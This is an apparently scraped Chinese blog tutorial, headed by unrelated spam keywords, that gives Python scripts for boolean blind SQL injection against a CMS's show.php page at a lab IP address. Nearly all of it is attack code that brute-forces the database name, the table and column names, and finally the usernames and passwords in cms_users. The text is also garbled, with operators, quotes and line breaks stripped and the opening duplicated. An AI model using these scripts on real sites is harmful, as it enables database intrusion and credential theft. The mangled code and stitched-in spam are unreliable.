南康区建设局网站,网络营销专业技能,红尘直播,做qq代刷网站SQL注入漏洞:CMS布尔盲注python脚本编写 文章目录 SQL注入漏洞:CMS布尔盲注python脚本编写库名爆破爆破表名用户名密码爆破 库名爆破
import requests
#库名
database
x0
while requests.get(urlfhttp://10.9.47.77/cms/show.php?id33%20and%20length(data…SQL注入漏洞:CMS布尔盲注python脚本编写 文章目录 SQL注入漏洞:CMS布尔盲注python脚本编写库名爆破爆破表名用户名密码爆破 库名爆破
import requests
#库名
database
x0
while requests.get(urlfhttp://10.9.47.77/cms/show.php?id33%20and%20length(database()){x}).headers[Content-Length]! 5263:x1 #爆出当前库名长度
for j in range(1,x1):# 对库名的每个字符进行爆破for i in range(20,127):responserequests.get(urlfhttp://10.9.47.77/cms/show.php?id33%20and%20ascii(substr(database(),{j},1)){i}) #爆破库名if response.headers[Content-Length] 5263 : #如果长度为5263说明爆破成功databasedatabasechr(i)
print(database) #打印库名效果:
爆破表名
table_name_list[]
x0
while requests.get(urlfhttp://10.9.47.77/cms/show.php?id35%20and%20length((select%20table_name%20from%20information_schema.tables%20where%20table_schemadatabase()%20limit%20{x},1))999).headers[Content-Length] 5146:x1 #统计表的数量
for i in range(0,x):y1while requests.get(urlfhttp://10.9.47.77/cms/show.php?id35%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schemadatabase()%20limit%20{i},1),{y},1))%3E20).headers[Content-Length] 5146:y1 #统计每个表名有几个字符table_name for j in range(1,y): # 对每个表名里的字符进行爆破for k in range(20,127):if requests.get(urlfhttp://10.9.47.77/cms/show.php?id35%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schemadatabase()%20limit%20{i},1),{j},1)){k}).headers[Content-Length] 5146:table_namechr(k)print(table_name)table_name_list.append(table_name)
print(table_name_list)用户名密码爆破
import requests
x0
account_list[]
while requests.get(urlfhttp://10.9.47.77/cms/show.php?id35 and length((select column_name from information_schema.columns where table_schemadatabase() and table_namecms_users limit {x},1))).headers[Content-Length] 5146:x 1
#x为字段个数
print(所有表名)
for i in range(0,x1):account for j in range(1,100):flag0for k in range(20,127):if requests.get(urlfhttp://10.9.47.77/cms/show.php?id35 and ascii(substr((select column_name from information_schema.columns where table_schemadatabase() and table_namecms_users limit {i},1),{j},1)){k}).headers[Content-Length] 5146:accountchr(k)flag1if flag 0:breakprint(account)account_list.append(account)
user_List[]
password_list[]
for l in account_list:if lusername or l password:for i in range(0,100):flag0user password for j in range(1,100):dump0for k in range(20,127):if requests.get(urlfhttp://10.9.47.77/cms/show.php?id35 and ascii(substr((select {l} from cms_users limit {i},1),{j},1)){k}).headers[Content-Length] 5146:if lusername:userchr(k)dump1else:passwordchr(k)dump1if dump0:breakflag1if flag0:breakif l username:user_List.append(user)else:password_list.append(password)
print(账号密码)
for i in range(0,len(user_List)) :print(f{user_List[i]}:{password_list[i]})
